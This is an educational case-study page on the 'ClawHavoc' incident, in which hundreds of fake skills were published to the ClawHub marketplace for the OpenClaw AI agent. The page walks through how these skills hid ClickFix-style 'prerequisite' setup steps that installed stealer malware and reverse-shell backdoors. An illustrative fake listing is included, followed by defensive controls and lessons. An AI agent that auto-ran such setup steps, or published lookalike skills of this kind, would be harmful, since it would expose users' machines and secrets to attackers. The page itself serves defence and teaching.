🔍AI RiskAtlas
← Real-world cases
Case study

ClawHavoc — mass poisoning of OpenClaw's ClawHub agent-skill marketplace

Real-world incident01 Feb 2026🗺️ Tool-Using Agent

Attackers flooded ClawHub — the skill marketplace for the popular OpenClaw AI agent — with at least 341 malicious 'skills' that tricked agents/users into installing the Atomic macOS Stealer and reverse-shell backdoors.

Root cause — why it happened

The OpenClaw agent gets new abilities by installing community 'skills' from an online store called ClawHub — much like adding apps to a phone. People pick a skill by its name, its polished description and its apparent popularity. Attackers flooded that store with hundreds of fake skills dressed up as useful tools. Each one's instructions included a 'before you can use this' setup step that told the user (or their agent) to run a command or open a password-protected file. That step quietly installed data-stealing malware and a hidden remote-control backdoor, then shipped the victim's secrets off to the attacker. The core problem isn't that the AI was tricked by clever words inside a document — it's that the marketplace let anyone publish a skill with no real proof of who made it, and nothing checked the 'setup' command before a human was nudged into running it on their own machine.

Risks this case illustrates

Named in the standard (OWASP/ATLAS/NIST) lens. Click a highlighted component in the diagram below to see which risks attach where.

How it unfolded

UntrustedAgent coreOversightThe real world≥341 malicious skills published🧑User🎛️Orchestrator /Agent Loop🧠LLM🔐Identity &Permissions🔧Tool RuntimeHuman ApprovalGate🔌External APIs🗄️BusinessDatabase🌐UntrustedContent📝Audit Logging🏪ClawHub skillmarketplace🧰Malicious'skill'🖥️ClickFix'Prerequisites'🌐Attacker C2 /exfil sink
InstructionsDataActionsControl / decisionFeedback / logs
👆 Click a component to inspect its risks
SetupStep 1 / 6

Attackers flood the marketplace with fake skills

OpenClaw is a hugely popular open-source AI agent, and it gets new powers by installing community 'skills' from a store called ClawHub. Anyone can publish a skill there. Attackers took advantage of that: starting in late January 2026 they uploaded a flood of fake skills, each one polished to look like a genuinely useful tool, with a professional description to win trust. The store had no real way to prove who made each skill.

🌐ClawHub listing (illustrative)webpage
ClawHub > Skills > productivity

  fast-notes-sync   ★★★★☆  (impersonates a real utility)
    "Sync your notes across devices from OpenClaw. Trusted by thousands."
    publisher: not verified   signature: none   downloads: (inflated)

  [+] Install        [ View source ]      [ Report ]
# Catalog metadata looks clean. No signed authorship. Payload is in the docs.
# ≥341 such listings found among ~2,857 live skills; 335 one campaign.
Step 1 / 6

Controls & guardrails — what would have stopped it

Two things break this chain. First, make the marketplace prove who made each skill — signed by a known publisher and reviewed — so attackers can't flood it with hundreds of fakes that ride on fake popularity. Second, treat a skill's 'setup step' as dangerous by default: never auto-run it, run it in a locked-down sandbox, and make a human approve anything that wants to execute code or phone home. Together, a fake 'prerequisite' command has nowhere to detonate. Filtering the skill's description wouldn't help — the trap was in human-facing instructions, and the harm ran outside the AI entirely.

Preventive
  • Provenance & content signing

    Provenance proves origin, not safety; a trusted source can still be wrong or compromised. Requires discipline to propagate metadata end to end.

  • MCP/plugin pinning, manifest hashing & re-review

    Review catches what reviewers understand; a subtle malicious directive can pass. Pinning helps only if you actually re-review on update rather than auto-accepting.

  • Human-in-the-loop approval on high-risk actions

    Approval fatigue turns gates into rubber stamps; gates placed after the point of no return do nothing; and approvers can be misled by a model-written summary of the action.

  • Egress allowlisting & DLP on tool arguments

    Allowlists fight an open-ended channel; legitimate-but-broad destinations (any URL fetch, any email) are hard to constrain without breaking usefulness. Encoding can evade naive DLP.

  • Least-privilege identity & scoped credentials

    Doesn't prevent manipulation — only caps its reach. Hard to get right operationally; over-broad scopes are the common real-world failure.

  • User AI-literacy & verification workflows

    Relies on human diligence under time pressure; automation bias is strong and training decays. A backstop, not a guarantee.

Detective
  • Runtime monitoring & anomaly detection

    Detects the anomalous, not the novel-but-subtle; high false-positive rates cause alert fatigue. Always a step behind a sufficiently quiet attacker.

  • Full-trace audit logging

    Logging is forensic, not preventive — it explains harm after the fact. Useless if no one reviews it or if the materialised context isn't captured.

Corrective
  • Governance: risk assessment, red-teaming & incident response

    Process reduces likelihood and speeds recovery but executes no technical control itself; weak follow-through makes it theatre.

  • Loop/cost circuit-breakers & consistency checks

    Thresholds are blunt — too tight breaks legitimate long tasks, too loose lets damage accrue first. Catches runaway dynamics, not a single well-formed bad decision.

Lessons

  • The capability marketplace is the agentic supply-chain attack surface: poisoning the store that provisions agent 'skills' turns an ordinary 'install a skill' workflow into mass host compromise (≥341 malicious skills; 335 one campaign 'ClawHavoc').
  • Reputation is forgeable; provenance is the boundary. ClawHub selected skills by name/description/popularity with no signed authorship, so a coordinated actor sybil-published hundreds of lookalikes that looked legitimate.
  • The harm hid in human-facing docs, not in tool code the model runs. A ClickFix 'Prerequisites' step (obfuscated script / password-protected ZIP) converts a documentation read into local RCE — so description filters and agent-call validation never see it.
  • Treat a skill's setup command as untrusted code: never auto-run 'prerequisites', sandbox install-time execution, and require human approval for any code-exec or egress — the installer-execution gate is the missing control here.
  • Agent telemetry is blind to this class: the compromise runs outside the agent, as the user. Detection must live at the host and egress layers (new stealer/reverse-shell processes, anomalous C2) and in artifact review (password-ZIPs, obfuscation as AV-evasion tells).
  • Counts grow as analysis deepens: figures rose from at least 341 toward 1,000+ (Trend Micro, Snyk, Antiy). Cite point-in-time numbers as 'at least 341 / 335-campaign' and attribute later totals to follow-up analysis.

Sources

AI RiskAtlas is an educational model of how GenAI & agentic systems work and fail. Architectures and payloads are illustrative and simplified for learning — not operational guidance. Real-world cases are summarised from public reporting.

Sources & further reading →·Built by Shi Yuan ↗